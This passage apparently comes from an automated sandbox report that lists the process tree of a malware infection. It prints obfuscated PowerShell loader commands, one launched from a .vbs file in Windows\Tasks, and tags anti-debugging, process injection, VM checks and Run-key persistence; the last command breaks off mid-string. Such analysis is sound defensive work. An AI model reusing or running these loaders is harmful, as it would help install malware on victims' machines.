'222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433A160900515D2B1C1E1C151F180A0D0A0D0D1C150A1C170A55594F4C4955595D35161C0A1710171E1C0B171C55595D2B1C1510120F101C0B0A50';.$Vindskibelig7 $electrosurgically1;$electrosurgically2 = Occludent0 '5D3F160B0D0D1710171E0A090C17120D1C0B594459222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433E1C0D3D1C151C1E180D1C3F160B3F0C171A0D101617291610170D1C0B5151361A1A150C1D1C170D4B4B595D29160B0D0B595D0C1710091C150D180D1C50555951361A1A150C1D1C170D4B4A5939512230170D290D0B2455592230170D290D0B2455592230170D290D0B2455592230170D290D0B2455592230170D290D0B245059512230170D290D0B24505050';&($Vindskibelig7) $electrosurgically2;$electrosurgically3 = Occludent0 '5D3F160B0D0D1710171E0A090C17120D1C0B5730170F16121C515D380C0B101E18154A555D35161C0A1710171E1C0B171C555D380B1B1C131D0A16091E180F1C170A5549554950';&($Vindskibelig7) $electrosurgically3#"
            5⤵
            • Checks QEMU agent file
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:4308
            • C:\Program Files (x86)\internet explorer\ieinstal.exe
              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
              6⤵
                PID:1368
              • C:\Program Files (x86)\internet explorer\ieinstal.exe
                "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                6⤵
                • Checks QEMU agent file
                • Adds Run key to start application
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of SetWindowsHookEx
                PID:4620
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\details.pdf"
          3⤵
          • Checks processor information in registry
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1936
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3544
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=61A2584CA152B2B1EA07FEE6BA33BAD8 --mojo-platform-channel-handle=1716 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              5⤵
                PID:5032
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D2CC59D1EE25749EEEFA0A4E1C814A95 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D2CC59D1EE25749EEEFA0A4E1C814A95 --renderer-client-id=2 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job /prefetch:1
                5⤵
                  PID:3908
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4CC178ECCE399750B44843148CE54830 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  5⤵
                    PID:4656
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=194887109978CDBCC9DA587ACD5403F9 --mojo-platform-channel-handle=2400 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    5⤵
                      PID:3056
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C07DCF4AAD44446F500B90463B312A30 --mojo-platform-channel-handle=1836 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      5⤵
                        PID:32
              • C:\Windows\system32\mmc.exe
                "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
                1⤵
                • Drops file in System32 directory
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:320
              • C:\Windows\system32\werfault.exe
                werfault.exe /hc /shared Global\0b2631f7fcc743438bc588e7cad951d8 /t 3828 /p 3776
                1⤵
                  PID:2352
                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                  1⤵
                  • Modifies registry class
                  • Suspicious use of SetWindowsHookEx
                  PID:2068
                • C:\Windows\System32\rundll32.exe
                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                  1⤵
                    PID:4068
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\details.pdf"
                    1⤵
                    • Checks processor information in registry
                    • Modifies Internet Explorer settings
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:4680
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                      2⤵
                        PID:4588
                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E062C258BA79E07E6153F9F7802D0BB8 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E062C258BA79E07E6153F9F7802D0BB8 --renderer-client-id=2 --mojo-platform-channel-handle=1700 --allow-no-sandbox-job /prefetch:1
                          3⤵
                            PID:1280
                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C09979612F8D0A5557AAA7DEB1D8C9CA --mojo-platform-channel-handle=1856 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                            3⤵
                              PID:4180
                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7E125BE5015DF1CF47ABE4B0C27AD3BA --mojo-platform-channel-handle=2304 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                              3⤵
                                PID:1436
                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AD3CAD7465E5B98ACA41C5770FB561DE --mojo-platform-channel-handle=2540 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                3⤵
                                  PID:4072
                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=750C137A877EACCAD4A4BE4C8C9F30E1 --mojo-platform-channel-handle=2428 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                  3⤵
                                    PID:2516
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Windows\Tasks\Tipalose.vbs"
                                1⤵
                                • Checks computer location settings
                                PID:1996
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Delirifacient = """Tit;EcrFantuAddnProcUnstrigiIndoCornSum IndOFricForcIndlLysuTradRaveBarnMaxtSoc0Abi Whi{Whi Rvr Agg Ons SlgpStvaKurrStaaSpamSti(Spe[SweSTratLevrTekiChinHykgCom]Cog<HanSUnktNonaTinmAktgRgesMictSpu)Cor;skr Vur Ort Hol Brn<StaDtariTrivVrkifissToloquarPissBun3Bew1Fif Und=Spe BacNAljeBliwMil-GolOVasbAnojCoueVincmt tund BrebWadyFjrtKnaeLre[Cat]Ram For(Ret<AmpSInstdruaSimmPergketsEfttAth.SalLriseNonnPargBeftpaahEag Mis/Sil Met2Exc)Apo;Una Sla Sta Sto CerFTrioMuorKau(Elm<MarUDisncofnBrauJoutLerrSneiUnstTeliFemoPaauTopsMet=Emn0Mrk;Afs Fin<VinUAthnAlinKlouLattElarAcaiTertOraiCneoRaauTabsSca Nea-ForlHyetCot Dec<PreSUnetbabaObdmNitgbetsBantIll.CloLJobePronSelgFortPhthEur;Fll Cor<OveUPolnBurnStruraatoverKniiSpitNoriIndofeduMilsCar+Lin=Str2con)Unp{Spg til Blo Inf Sub But Bla Dup Tip<KomDPeciKomvGobiovesBuroAbsrSalsIdl3Hor1Dem[For<DelUCapnJaynforuBygtfisrBasiIndtSvoiBasoFinuOpfsTav/Cuf2Fac]Kon Dyn=Dmi Sam[ValcIndoAfhnSnuvUnheBarrUnftUng]Ajl:Ing:SubTIonoUnqBDecyAletpyreGen(Vac<LevSDigtapoaDanmNedgBassSpltTra.DavSPapuFilbIndsDiptZacrDyeiBernLregUds(Del<ConUBinnThinsubuBastGolrDisiGlotGraiBasoBeuuDeksBon,Gad afs2Har)Lev,Rea Mim1Exp6Dih)Hrs;Aud til Ade<KonDCroiPutvTiditilsFjeoRebrUtlsDef3Use1Bru[lau<AncURainKvdnDenuScitHumrKneiBrutBeniEneoDumuUbesant/Slu2Dil]Und Dri=ade tri(Eff<SubDKoniSprvForiBrksKlaoRigrZarsFel3Bes1Ern[Des<BerUsnanSernSubuFiltPedrSupiUndtChoiStioSamuBecsRen/Fox2Fyl]Res Enn-RegbStexDouoEmbrVod Bge1Kem2Fan1Mex)Ill;Agg vir Sla Sli God}Mrk has[IndSTrktProrDisicamnXylgPla]Van[IscSUdpyUnhsKlotHateSysmVed.ArcTReceUntxLagtHus.TokESemnSiecAdvoPigdRepiLamnHecgMem]Dyd:Kro:NonAnedSferCSanIIncIStv.EgeGTrteBrotComSStitSusrSagiGennGumgAir(Dri<RouDFraiGenvMoniFrisPreoUsarMarsReb3Res1Tot)lap;Let}Arr<MigCFraoHjemWelpDuguNonlOvesTriiespoRutnDis0Rad=SavOMedcFracVrklOpluSaldGraeJolnRaatinc0Res Nit'Pre2BruAant0Pro0Sko0AfkARev0HaaDEco1ArbCIld1Loc4uns5Arv7Org1LyzDRab1unc5Cre1Non5Gam'sai;tab<DraCColoErhmCoapdevuPrelHvasStuiFraoBufnBen1Dip=HovOLimcRllcOddlhyruTardLyeeMimnOvetSpo0For Tuf'vra3Opv4Sup1Men0Sol1uddAFus0ProBGeo1Bar6Tur0bogASem1Blo6Tol1AfgFUnl0SamDjak5Sta7Syl2perEExt1Pro0Hov1Byd7Fol4UmtAGob4OnoBSpr5For7Ant2indCRek1res7Hyp0GolAGem1Rit8Col1DemFUnc1KonCant3Agl7Unf1Vrn8spo0BryDSal1bis0Man0aloFNon1DieCHyd3Lep4Mis1borCDeb0DriDBla1Ser1Til1Sri6Kec1ProDpro0CalADof'Dra;Ges<NowCAteodotmFripVrduBillForsAariVanoUmyntur2Swa=QuiOcyncSamcGevlDeouCondFruesqunBantCla0car Bge'Pat3KooEspe1UkuCUhe0upgDHyp2Miz9Dec0DenBEpi1Lec6Par1SatANon3Gal8Law1SnuDPsy1SneDUlt0ProBCol1ForCBad0CneAXyl0TriAArr'Uni;Rou<DecCOutoVagmHavpLeauMyclSucsFeeiBruoCoonBio3Una=FoeOAgucEurcWallGowuStrdToxeBagnAbdtNon0Civ Pig'sab2AngAFor0Skr0aff0wasAImp0NonDAlo1SkaCTel1Lan4Tra5Tem7Leo2KofBTub0EnfCVek1Har7Out0BedDvad1Fea0Per1Bor4Tra1TryCUnd5Coe7Byg3Wil0Arn1Esl7Jus0RouDAfd1TviCPer0SknBSko1Pre6Fje0Spl9Sul2AdvASki1PueCNon0DalBMed0MerFMoo1Aut0Seb1CarAHav1IsnCAbd0ImiAKlu5Afl7Sim3sna1sir1Pyn8Ela1Ere7Egr1LeaDFre1int5Lov1SucCWar2PagBUns1UdvCDip1BhaFOve'Kuv;Syg<StaCOilotarmKonpSeluBaslhulsaaniTeroDysnSpi4Uni=HegOEngcDemcEellaftuRegdElieUngnMortFol0Fem Gen'Kni0RudABor0SnaDArr0FunBOpb1Sup0Opt1Asc7Bar1NasESko'For;Und<JorCNeioStumfarpUnfuRumlBedsUntiFatoGranDys5Cre=KlaOMencUrocOlilKnouOvedCofeSemnTyrtFor0Vel Per'Sid3CakEFas1LyrCSpa0VidDCel3Anc4Ham1Tub6Meg1BooDBle0RooCSpi1Kar5The1NigCSam3Ove1Ros1Rig8Muh1Mil7Tri1FllDgru1Cam5Til1TroCArt'Sub;pet<SubCHaloToimOptpLevuTirlOffsDisifleoPolnSna6Ste=AffOBlucChacTowlRicuKeldForeLdinFlatNat0Bra Nep'Vir2StrBDic2StrDDre2curASta0Abb9Som1IsoCHig1NorApre1ant0loy1Hul8Ung1Ove5Rin3ove7Uns1Uhi8Bal1Pla4Ene1SphCbro5For5Unj5Dis9Opt3Inv1Bil1Pra0Rad1ShuDHor1TynCTpp3TetBCal0Pul0Col2MyrALug1Mor0Hoo1MinEGge5Uds5Col5Uni9aan2Skr9cor0LyrCPho1AntBLed1Fre5Saa1Cru0Pru1KanAWis'oms;Fri<snaCImpoSalmSkipBeduGillQuasMiliTaloPernWhi7Pis=RetOForcheacreflAdauNordLeaeAirnBedtGes0Iri Spi'Sta2JehBMom0NedCBas1Sit7Sty0PraDAan1gym0Dem1Par4sca1TabCNat5Ple5Hov5Fro9Win3Exe4ove1Ple8Unc1Red7Koo1Dve8Dag1PreESlv1PieCTek1AnrDSyn'Kup;rin<JasCPseoBilmSqupHypuSmulOrdsBruiCaroSannMes8Gra=supOQuicNajcBedlOptuTildHaneUbcnLantDan0Sne Akt'Soi2FloBPer1HelCSch1PrdFBev1Inw5Waf1VurCMal1eftAAta0afbDSou1UndCRec1DucDRis3relDVer1RepCCyk1Sem5Rmn1YelCFre1EntERed1Hyp8Est0UruDFru1FryCCli'Gui;Sty<DeiCSlaoarbmMinpBauuDialMizsIotisaloBecnFus9Ima=FroOChucCivcConlPauuInddBereFeanLogtPep0Exp Inc'Ele3Aer0Sky1unr7Bop3Fai4Fre1PliCPse1Tas4Cur1Tel6Byn0ExcBAlt0Par0Sec3Cou4Sch1Led6Sys1hydDCir0SolCSki1Sug5Tva1UdeCFre'Ass;tva<SubVLegiEksnBildKirsForkStriTorbTryeWallMeiiSkogInt0app=ChoOpumcTercforlInfuBlvdDeteJennUdltLam0Sky Jas'Chu3Opt4Keg0Bra0Jos3SubDSko1SkaCBvl1Pag5Rej1LitCFor1staEDer1Glu8Kar0SafDTuc1RoyCRep2StrDtol0Ban0Pap0Cli9Beb1LatCLox'Per;Fac<BemVUnsistinGgedRefsDetkKryiFisbAebeperlBegiSkagFor1Non=indOTygcAntcjeflHymuStndStreSernProtInd0Pan Reg'akt3EksADuk1Eos5Mac1Egi8Fel0SupAVid0PinABal5Trs5Ked5iso9Try2Gen9Kat0BarCFjo1MesBPro1Uss5And1Gun0Bil1UmyASte5Oms5App5Svr9Neu2BymAwhe1MicCall1Neb8Tlp1Jar5Gal1NonCOve1TegDDis5bes5Kri5Sam9Kus3Vel8Zac1Ant7Ape0ForASki1Zyg0Hum3SmmASta1Nut5Mut1med8Kog0BisAber0ShiAKos5Bes5Fag5Pri9Coe3Ski8Res0UngCExo0aglDJeo1Apo6Ove3PisABuf1Whi5Gas1His8Ser0MouASte0BrnADro'Wre;Afv<IkrVIldiPrenSimdSersTorkTriiAdebKinepinlDoniDokgCar2sci=BenObjrcUnbcantlSavuVendRetechenDkvtFre0Man vaa'Kon3Rif0Her1Ant7Aut0AntFKat1Koe6Vas1Out2Udv1SlaCOut'Dep;erh<DecVFeriSmenBridImpsKrlkFriiVanbTrieBuslGitiNongSta3Gel=GruOHercPhocSuilNonuSubdArbeFlunDritCal0Bli Soa'Fem2Emp9for0DiaCCal1OohBSla1Ska5Out1Non0ech1SpkANon5Sun5Hal5Ove9Cel3Lil1Sil1Wor0Sty1MisDStj1AphCTid3aarBMoc0hag0Cho2BloALib1Ver0Cen1SolESla5Kor5Mot5Bag9Gen3Sco7Ung1PerCSwi0SciEaut2TieAMar1Bed5Pap1Lim6Dys0ThyDNup5Omd5Unh5Mad9Tep2BygFsub1Par0Pri0PonBPol0TomDTil0CosCKer1Unv8Tid1Mel5Hov'Dok;Uni<BegVlupiSlanAftdShrsPoskBelikonbGuyeSeilMisihjmgSkr4Ste=FreOWorcWatcSkolOnsuMajdEnfeModnIndtFor0Obe Une'Bar2MadFVet1Ban0Bri0MedBchu0MopDAdn0cynCVia1Frs8esc1Rec5Dig3Uds8lop1Sms5Ric1Sto5Mul1Ste6Sky1BloAPro'Ele;Thr<NigVHeriSplnPapdconsDisksphiRivbTraeElvlHaliDrogMed5Int=LacOspicNoncCanlOveuDiadFageKannfadtArb0Ant Ama'hai1div7St 0NatDEve1HylDRed1Sla5Dse1Und5Neb'Tar;Spe<embVTyviSilnstvdOmesSmukPleiDelbJuleRowlAduiThagTem6omp=PorOSavcLuscBiglTenuKnadSikeTranHumtNek0For Buk'ska3Foo7Pet0EneDpos2Uro9Prs0KalBSec1Kvi6Cla0SojDFro1LrkCNeg1StaABre0LisDSli2bouFalk1Puc0Sat0HolBRes0SymDslu0aguCSch1Sab8Dis1Run5Ber3Sta4Pio1SlaCHel1Sid4woo1Els6Int0OrdBSub0Nuc0pre'Sir;Blu<NonVHeniGudnSasdEvisPigkAkkiUdkbEkseDiklOrdiHongCar7Ban=HanODencForcAnblHjluBlodRotekonnOvetUna0Mav Opk'Gai3Gim0Mis3resCVir2Pom1Fra'Und;Gea<RumVPoiiSlinTardSnasPerkPreiBrubUndeBunlHeniPregCau8Her=StoOSyncafvcmatlChouDdbdLisePadnToltsni0Dia Und'Sha2euk5Eks'Alv;Sch<ForPPrioHovrKortzeurhal=EnlOLancGencFeulCaluSkndGeleMednPlutJag0Bis 